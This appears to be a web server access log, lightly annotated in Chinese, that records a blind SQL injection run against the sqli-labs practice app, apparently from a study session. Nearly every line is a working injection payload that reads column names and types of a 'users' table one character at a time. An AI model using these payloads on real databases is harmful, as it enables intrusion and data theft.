10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),2,1))>51 AND 'yEcN'='yEcN HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),2,1))>48 AND 'yEcN'='yEcN HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),2,1))>9 AND 'yEcN'='yEcN HTTP/1.1" 200 670

id 列名

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),1,1))>64 AND 'NyhC'='NyhC HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),1,1))>96 AND 'NyhC'='NyhC HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),1,1))>112 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),1,1))>104 AND 'NyhC'='NyhC HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),1,1))>108 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),1,1))>106 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),1,1))>105 AND 'NyhC'='NyhC HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),2,1))>96 AND 'NyhC'='NyhC HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),2,1))>112 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),2,1))>104 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),2,1))>100 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),2,1))>98 AND 'NyhC'='NyhC HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),2,1))>99 AND 'NyhC'='NyhC HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),3,1))>96 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),3,1))>48 AND 'NyhC'='NyhC HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),3,1))>1 AND 'NyhC'='NyhC HTTP/1.1" 200 670

int(3) 类型

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),1,1))>64 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),1,1))>96 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),1,1))>112 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),1,1))>104 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),1,1))>108 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),1,1))>106 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),1,1))>105 AND 'EeBE'='EeBE HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),2,1))>96 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),2,1))>112 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),2,1))>104 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),2,1))>108 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),2,1))>110 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),2,1))>109 AND 'EeBE'='EeBE HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),3,1))>96 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),3,1))>112 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),3,1))>120 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),3,1))>116 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),3,1))>114 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),3,1))>115 AND 'EeBE'='EeBE HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>96 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>48 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>1 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>24 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>36 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>42 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>39 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),4,1))>40 AND 'EeBE'='EeBE HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),5,1))>64 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),5,1))>32 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),5,1))>48 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),5,1))>56 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),5,1))>52 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),5,1))>50 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),5,1))>51 AND 'EeBE'='EeBE HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>47 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>1 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>24 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>35 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>41 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>38 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>39 AND 'EeBE'='EeBE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),6,1))>40 AND 'EeBE'='EeBE HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),7,1))>64 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),7,1))>32 AND 'EeBE'='EeBE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x6964 AND table_schema=0x7365637572697479),7,1))>1 AND 'EeBE'='EeBE HTTP/1.1" 200 670

username 列名

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),1,1))>64 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),1,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),1,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),1,1))>120 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),1,1))>116 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),1,1))>118 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),1,1))>117 AND 'GMlF'='GMlF HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),2,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),2,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),2,1))>120 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),2,1))>116 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),2,1))>114 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),2,1))>115 AND 'GMlF'='GMlF HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),3,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),3,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),3,1))>104 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),3,1))>100 AND 'GMlF'='GMlF HTTP/1.1" 200 750
